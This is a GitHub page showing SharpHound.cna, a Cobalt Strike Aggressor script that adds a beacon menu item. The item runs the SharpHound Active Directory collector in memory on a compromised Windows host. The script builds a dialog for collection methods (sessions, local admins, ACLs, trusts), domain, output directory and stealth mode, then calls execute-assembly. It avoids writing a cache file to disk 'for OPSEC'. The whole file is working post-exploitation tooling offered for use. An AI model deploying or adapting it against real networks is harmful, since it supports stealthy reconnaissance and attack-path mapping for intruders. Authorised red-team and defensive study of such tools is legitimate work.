-
Notifications
You must be signed in to change notification settings - Fork 2
/
SharpHound.cna
55 lines (46 loc) · 1.76 KB
/
SharpHound.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# SharpHound Aggressor Script
# Author: @captmeelo
# Blog: https://captmeelo.com/
# GitHub: https://github.com/capt-meelo
# Location of SharpHound binary
$assembly = "C:\\tools\\SharpCollection\\NetFramework_4.5_x64\\SharpHound.exe";
popup beacon_bottom {
item "SharpHound" {
runSharpHound($1);
}
}
sub runSharpHound {
$bid = $1;
$dialog = dialog("SharpHound", %(collectionmethod => "Default", outputdir => "C:\\Windows\\Temp\\"), lambda({
$collectionmethod = $3["collectionmethod"];
if ($3["domain"] ne $null) {
$domain = $3["domain"];
$domain = "--Domain $domain";
} else {
$domain = "";
}
if ($3["stealth"] eq "true") {
$stealth = "--Stealth";
} else {
$stealth = "";
}
if ($3["outputdir"] ne $null) {
$outputdir = $3["outputdir"];
$outputdir = "--OutputDirectory $outputdir"
} else {
$outputdir = "";
}
$command = "--CollectionMethod $collectionmethod $domain --NoSaveCache $stealth $outputdir";
binput($bid, "execute-assembly $assembly $command");
bexecute_assembly($bid, $assembly, $command);
})
);
dialog_description($dialog, "Execute SharpHound without saving cache file to disk for OPSEC.");
drow_combobox($dialog, "collectionmethod", "Collection Method:", @("All,GPOLocalGroup", "All", "Default", "Group", "LocalAdmin", "RDP", "DCOM", "PSRemote", "GPOLocalGroup", "Session", "ComputerOnly", "LoggedOn", "Trusts", "ACL", "Container", "DcOnly", "ObjectProps"));
drow_text($dialog, "domain", "Domain: ");
drow_text($dialog, "outputdir", "Output Directory: ");
drow_checkbox($dialog, "stealth", "Stealth Mode: ", "Enable");
dbutton_action($dialog, "Run");
dbutton_help($dialog, "https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html");
dialog_show($dialog);
}